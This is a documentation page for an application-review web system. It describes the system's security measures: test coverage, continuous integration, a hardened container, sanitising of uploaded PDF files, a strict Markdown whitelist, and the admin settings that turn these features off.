Note
Audience: Jury Manager to adapt, all for information.
Security considerations and features#
The application is thoroughly tested with 100% test coverage, ensuring that every part of the application and every scenario is tested. Before testing all scenarios, all role-based permissions and controls are tested separately, with a required coverage of 100%, ensuring that this key feature is well tested.
The application’s source code is hosted on GitLab, a software forge. Continuous integration has been set up to test the application at each commit. Unit tests act as a safeguard, preventing new versions from being deployed if they introduce regressions. Reducing test coverage is also prohibited for the master branch and production instances.
The application runs in a “hardened” Docker container. This means that several security measures have been implemented to prevent code injection and ensure stability. The source code is set to read-only within the container, preventing unauthorized modifications or tampering. Additionally, it runs as a non-root user, limiting access to critical system resources and preventing unauthorized modifications or tampering with the system and sources. As a consequence, patching the application during execution is impossible, changes must be committed to the source repository where authorship is unquestionable and changes are thoroughly tested.
These combined measures provide a secure and stable environment for our users.
Protection from attacks using PDF#
A CV can be provided in a PDF file. This file format comes with features that can be exploited to attack the application, such as stealing session cookies or extracting application content. To prevent this, all executable code is stripped out from uploaded PDF files.
Uploading a CV in PDF file can be disabled in https://ebaii-ngs-niveau1-internal.pasteur.cloud/setup/#candidate-settings. If disabled, you may need to adapt the introduction text presented to applicants on how to apply. This text is visible at https://ebaii-ngs-niveau1.pasteur.cloud/candidate/apply/Intro/. To do so, use the Language override module.
Protection from attacks using Markdown#
Markdown is used to format motivation letters, calls, and more. This standard is exposed to JavaScript or CSS injection from attackers. A strict whitelist approach has been adopted, preventing almost all use of HTML within Markdown.
Markdown can be disabled for the entire application in https://ebaii-ngs-niveau1-internal.pasteur.cloud/setup/#mail-settings. If disabled, all content is escaped, and line breaks are replaced by <br>.